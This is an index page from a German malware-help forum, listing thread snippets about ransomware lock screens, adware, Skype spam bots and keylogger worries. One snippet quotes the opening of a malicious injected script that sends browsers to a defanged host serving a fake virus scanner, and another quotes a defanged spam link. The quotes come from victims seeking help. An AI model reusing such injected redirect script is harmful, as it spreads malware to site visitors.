Zurück   Trojaner-Board > Themen

Alles zum Thema: Benutzername

  Letzter Beitrag Antworten Hits Forum
GVU Trojaner Windows XP
Benutzername - Hallo! Ich habe mir den GVU Trojaner bei meinem XP System eingefangen. Unter meinem Benutzernamen der als "Hauptbenutzer" drin ist, kommt der Sperrbildschirm. Wenn ich mich als Administrator anmelde, kann ich ganz normal aufs System zugreifen. Hier auch die Log files von defogger, gmer und...
Log-Analyse und Auswertung
5versuche mein PW zu knacken. IP des "Hackers" im Besitz!
Benutzername - Ich hoffe ich hab mein Thema im richtigen Bereich eröffnet... Hi, ich hab nur kurz eine kleien Frage. Ich habe von Minecraft.net eine email bekommen das man 5 mal mein Passwort falsch eingegeben hat und das derjenige vorerst gesperrt wurde. ( ich wars nicht^^ ) Auserdem hat mir Minecraft.net...
Überwachung, Datenschutz und Spam
C: Berechtigungen der "Authentifizierten Benutzer"
Benutzername - Ich habe versucht, die Berechtigungen von C: zu verändern, um Eraser zum Laufen zu bringen. Dabei ist der "Authentifizierte Benutzer" unter den Gruppen- oder Benutzernamen verschwunden. Kann mir jemand sagen, wie ich die Standardeinstellungen bei Eigenschaften / Sicherheit von C: wieder...
Alles rund um Windows
Windows Security PopUp
Benutzername - Hallo liebe Community, ich habe eine Frage: seit dem ich IE 10 bei mir installiert habe und bestimmte Seiten ansurfe, kommt ein Windows Sicherheits PopUp, das mich auffordert Benutzername und Kennwort einzugeben. Ich habe mal ein Screenshot davon gemacht. Ich habe keine Ahnung was da...
Alles rund um Windows
Snap Do Seitenumleitung (Firefox/Win7)
Benutzername - Hallo, mir ist heute eine kleine Merkwürdigkeit aufgefallen, die mich verunsichert. Eigentlich nutze ich nur die Google-Suchleiste. Aber nachdem ich ein Wort aus Versehen ohne www und ohne das Domain-Tag in die Adresszeile des Firefox getippt habe, kam ich auf eine Seite namens snap do, die...
Log-Analyse und Auswertung
Avira meldet ADWARE/Yontoo.E.1
Benutzername - Hallo zusammen, habe mir heute irgendwas eingefangen: Ich habe 2 Programme installiert und auf einmal meldet mir Avira den Fund von ADWARE/Yontoo.E.1 :pfui: im Verzeichnis C:\Users\Benutzername\AppData\Local\Temp\yontoosetup.exe. Den Fund habe ich in Quarantäne verschoben und dort ist er noch....
Plagegeister aller Art und deren Bekämpfung
Avira - 9 Viren / Trojaner! :(
Benutzername - Hallo zusammen, nachdem ich heute bei EBAY mich etwas umschauen wollte, habe ich gesehen, dass mein Benutzername sehr komisch dargestellt worden ist. Nach Recherche bei Google habe ich festgestellt, dass die Zeit für einen Scan wieder angebrochen ist. Via AVIRA habe ich dies dann auch getan:...
Plagegeister aller Art und deren Bekämpfung
Skype Problem
Benutzername - Hey ich bin neu hier und habe mal ne Frage : Alle 15 min wenn ich bei skype online bin schickt ein bot diese nachricht : hallo, sehr schöne fotos von dir echt! hxxp://is.gd/S7waQ1?skype= und dann der benutzername von skype . Ich weis nicht was das ist und auch nicht wie das weg geht !!! ...
Plagegeister aller Art und deren Bekämpfung
erstelltes Thema erscheint nicht
Benutzername - Hallo, bitte herzlich darum, daß irgendjemand mir mitteilt, warum mein neu erstelltes Thema nicht angenommen wird. Was habe ich falsch gemacht? Habe gestern in "Plagegeister aller Art und deren Bekämpfung" eine neues Thema erstellt, Titel: "Chatzum Search öffnet Seiten" Ich kann es aber trotz...
Plagegeister aller Art und deren Bekämpfung
Benutzername ändern
Benutzername - ich hoffe hier an richtiger stelle meinen wunsch zu äußern und würde gerne wissen, ob es board-regel-technisch möglich ist, dass man seinen benutzernamen / nick ändern kann?
Lob, Kritik und Wünsche
Eingaben mit der BildschrimTASTATUR gegen Keylogger wirksam?
Benutzername - Hallo zusammen. Ich habe mir die Frage gestellt ob moderne Keylogger es mitbekommen wenn ich die Bildschirmtastatur verwende? Zudem Frage ich mich ob es Schadsoftware gelingt die in bsw. Firefox gespeicherten Benutzernamen und dazugehörigen Passwörter auszulesen. Vielen Dank :-) Mfg...
Überwachung, Datenschutz und Spam
Winlogon.exe & csrss.exe...Virus? Trojan (?)
Benutzername - Hallo Allerseits, Nachdem ich nun einige Einträge,über mein Problem, im Internet gefunden habe...,habe ich nun berechtigten Zweifel ob mein PC noch "sauber" ist. Heute morgen,nachdem mein PC gelahmt hat, in meinem Task-Manager geschaut... Dort bei den Prozessen "winlogon.exe" und...
Plagegeister aller Art und deren Bekämpfung
GVU Trojaner? Zahlungsaufforderung und Webcamaufnahme
Benutzername - Hi Community, bin neu hier und hab schon bisschen was gelesen wo ich aber nicht wirklich durch Blicke. Ich habe vorhin den Laptop meiner Freundin angemacht und im Netz gesurft. Auf einmal kommt nen Fenster von der GVU, das der PC gesperrt wurde und ich 200€ oder so zahlen soll. Inklusive...
Plagegeister aller Art und deren Bekämpfung
Fake Virusscanner
Benutzername - Die Dateien werden von Webseiten heruntergeladen die diesen Code enthalten: < script > var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var...
Plagegeister aller Art und deren Bekämpfung
Verschlüsselungstrojaner Trojan.Generic.KDV.639843
Benutzername - Hallo an alle, meine Freundin hat auf Ihrem Netbook den Trojan.Generic.KDV.639843:pfui:! Da geht garnichts mehr, das Benutzterkontenbild ist anders und außer sich mit dem eigenen Passwort auf seinem Benutzernamen anmelden geht nix mehr. Es kommt dann ein Fenster wo eine Zahlung gefordert wird...
Plagegeister aller Art und deren Bekämpfung
pkg_0ll.exe
Benutzername - Hallo aus Wien, hatte gestern während des Russlandmatches eine böse Begegnung mit pkg_0ll.exe. Dieser Bösling setzt sich offensichtlich seit gestern rein und blokiert mit der bekannten AKM 50€ Meldung das gesamte System. Ich konnte ihn dann zuerst einmal aus dem Autostart rausbringen, war nicht...
Plagegeister aller Art und deren Bekämpfung
Malware in FlirtFever Mails!
Benutzername - Es gehen Mails von FlirtFever um mit Zahlungsaufforderung teils horrender Summen. Der "Witz" an der Sache ist, dass da die ECHTEN Benutzernamen des betreffenden (Ex)Mitglieds genutzt werden und somit sieht die Mail natürlich extrem echt aus und viele öffnen daraufhin diesen Anhang mit ZipArchiv...
Diskussionsforum
BKA-Trojaner
Benutzername - Hallo Leute, so, bin jetzt am ende mit meiner Computer-Latain... hab mir ein BKA-trojaner/Virus auf meinem Laptop eingefangen..... ich hab die Mailware von Malwarebytes und Emisoft probiert, sie finden nichts.... hab auch die grösse der "explorer.exe" Datei angeschaut, Diese SIND UNGEFAHR gleich...
Plagegeister aller Art und deren Bekämpfung
AKM Trojaner und OTLPENet.exe win xp 32bit
Benutzername - Bitte helft mir drigends... bin leider auch von den Trojaner befallen... :balla: Habe bereits OTLPE ausgeführt und OTL.txt erstellt von meinem betroffenen Benutzernamen. Bitte helft mir ein Fix dafür zu erstellen, denn leider habe ich durch den Administrator keine Rechte mehr irgend etwas...
Log-Analyse und Auswertung
csrss.exe, wisptis.exe doppelt
Benutzername - Guten Tag Community, In meinem Windows Taskmanager befinden sich zwei Mal der Prozess csrss.exe und zwei Mal der Prozess wisptis.exe (wisptis.exe ist einmal von meinem Benutzernamen und von SYSTEM verwendet). Das ist ungewöhnlich, dass zweimal die gleichen Prozesse am Laufen sind und csrss.exe...
Plagegeister aller Art und deren Bekämpfung
Trusted Installer
Benutzername - Hallo, Dies könnte für alle Windows 7 Neulinge interessant sein: Wenn man Programme aus dem Programme Ordner deinstallieren will (z.B. Internet Explorer, lästige Herstellerprogramme und Windows Launch Box), muss man sich die Rechte vom Trusted Installer Dienst geben lassen?! Ich habe...
Alles rund um Windows
TR/sirefef.BP.1 auf meinem Firmenrechner gefunden
Benutzername - Hallo alle zusammen, gestern wurde auf meinem Firmenrechner von Avira der TR/sirefef.BP.1 gefunden. Leider benutzen auch andere Mitarbeiter ab und zu diesen Rechner mit anderen Benutzernamen... Bitte um Hilfe, da ich wieder vernünftig damit arbeiten muss. Habe Malwarebytes mal drüber gejagt....
Plagegeister aller Art und deren Bekämpfung
OTL.EXE lässt sich nicht ausführen
Benutzername - Hallo TB-Team, ich habe folgendes Problem. Mich hat auch dieser "Windowssystem blockiert-Trojaner" erwischt. Um diesen Trojaner zu entfernen brauche ich den OTL-File. Habe nun hier gelesen, dass ich OTL.exe runterladen, diese Datei in einem USB-Stick kopieren, den Stick dann in meinem...
Log-Analyse und Auswertung
"Windowssystem aus Sicherheitgründen gesperrt"
Benutzername - Diese Sache scheint ja gerade die Runde zu machen... Meine Freundin bekommt auf ihrem Notebook ebenfalls seit heute diese Meldung "Ihr Windowssystem wird aus Sicherheitsgründen gesperrt...", sobald sie den IE startet. Wir haben daraufhin (wie die meisten hier ja auch) einen Scan mit OTL...
Log-Analyse und Auswertung
Unbekannte Namen im Browser
Benutzername - Hallo, Wenn man sich auf andere Webseiten einloggt kann man ja mit Doppelklick ein paar Namen aussuchen, heute habe ich gemerkt das dort auch Namen vorkommen die ich niemals verwendet habe! Ich habe bereits alle gefragt die direkten / realen Zugriff auf meinen PC hatten, keiner hat diese...
Log-Analyse und Auswertung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.